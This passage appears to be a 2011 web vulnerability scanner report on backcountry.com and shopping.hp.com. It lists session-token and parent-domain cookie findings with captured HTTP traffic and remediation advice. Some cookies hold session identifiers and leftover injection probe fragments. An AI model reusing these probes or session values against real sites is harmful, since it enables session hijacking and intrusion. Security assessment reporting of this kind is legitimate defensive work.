Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; CART=; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713387819; __ar_v4=; c49=PDP%3ABackcountry.com%20Gift%20Certificate; s_sq=bcbackcountry%3D%2526pid%253DPDP%25253ABackcountry.com%252520Gift%252520Certificate%2526pidt%253D1%2526oid%253Dhttp%25253A//content.backcountry.com/images/bcs/product_detail/add_to_cart.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: evans
Content-Length: 29511
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:11:53 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.7. http://www.backcountry.com/store/user.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.8. http://www.backcountry.com/womens-capri-pants  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /womens-capri-pants

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /womens-capri-pants HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-clothing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Moovweb-Pagetype: PRODUCT_GROUP
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: badlands
Content-Length: 162419
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.9. http://www.backcountry.com/womens-clothing  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /womens-clothing

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /womens-clothing HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Moovweb-Pagetype: CATEGORY
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: harvard
Content-Length: 104245
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

3. Cookie scoped to parent domain  previous  next
There are 19 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. http://www.backcountry.com/store/BCS0021  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/BCS0021

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/BCS0021 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Location: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT
Set-Cookie: RES_SESSIONID=256475435893179; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:39 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT


3.2. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/PRA0870/Bliss-Capri-Pant-Womens.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/PRA0870/Bliss-Capri-Pant-Womens.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Location: http://www.backcountry.com/prana-bliss-capri-pant-womens
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:22 GMT
Set-Cookie: RES_TRACKINGID=841292264887481; path=/; domain=backcountry.com; expires=Tue, 21-Sep-2021 22:11:21 GMT
Set-Cookie: RES_SESSIONID=253168360320593; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:21 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT


3.3. http://www.shopping.hp.com/design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

3.4. http://www.shopping.hp.com/desktops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.5. http://www.shopping.hp.com/esp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgt2U3wN6NSvrvlHYdgad0ic%3D; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 167900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.6. http://www.shopping.hp.com/go/microsoftoffers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/microsoftoffers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

